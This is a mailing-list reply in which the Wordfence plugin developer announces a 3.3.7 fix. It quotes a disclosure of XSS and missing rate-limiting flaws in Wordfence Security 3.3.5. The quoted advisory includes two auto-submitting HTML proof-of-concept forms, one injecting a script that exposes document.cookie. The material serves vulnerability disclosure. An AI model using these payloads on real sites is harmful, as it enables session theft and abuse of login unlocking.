This has been fixed and the release just went out. Version 3.3.7. The email param is now escaped and we've added rate limiting to the form with a 3 minute backoff if the limit is exceeded.
http://wordpress.org/extend/plugins/wordfence/changelog/ Thanks for your report. Regards, Mark Maunder. On Fri, Oct 19, 2012 at 7:16 PM, MustLive <mustl...@websecurity.com.ua>wrote: > Hello list! > > I want to warn you about Cross-Site Scripting and Insufficient > Anti-automation vulnerabilities in Wordfence Security for WordPress. > > Wordfence - it's security plugin for WordPress. > > ------------------------- > Affected products: > ------------------------- > > Vulnerable are Wordfence Security 3.3.5 and previous versions. > > ---------- > Details: > ---------- > > XSS (WASC-08): > > Wordfence Security XSS.html > > <html> > <head> > <title>Wordfence Security XSS exploit (C) 2012 MustLive. > http://websecurity.com.ua</title> > </head> > <body onLoad="document.hack.submit()"> > <form name="hack" action="http://site/?_wfsf=unlockEmail"; method="post"> > <input type="hidden" name="email" > value="<script>alert(document.cookie)</script>"> > </form> > </body> > </html> > > Insufficient Anti-automation (WASC-21): > > Wordfence Security IAA.html > > <html> > <head> > <title>Wordfence Security IAA exploit (C) 2012 MustLive. > http://websecurity.com.ua</title> > </head> > <body onLoad="document.hack.submit()"> > <form name="hack" action="http://site/?_wfsf=unlockEmail"; method="post"> > <input type="hidden" name="email" value="ad...@e-mail.com"> > </form> > </body> > </html> > > I've informed the plugin developer about vulnerabilities. And mentioned > about these vulnerabilities at my site (http://websecurity.com.ua/6106/). > > Best wishes & regards, > MustLive > Administrator of Websecurity web site > http://websecurity.com.ua > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- Mark Maunder <mmaun...@gmail.com> France: (+33) 068-700-8029
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
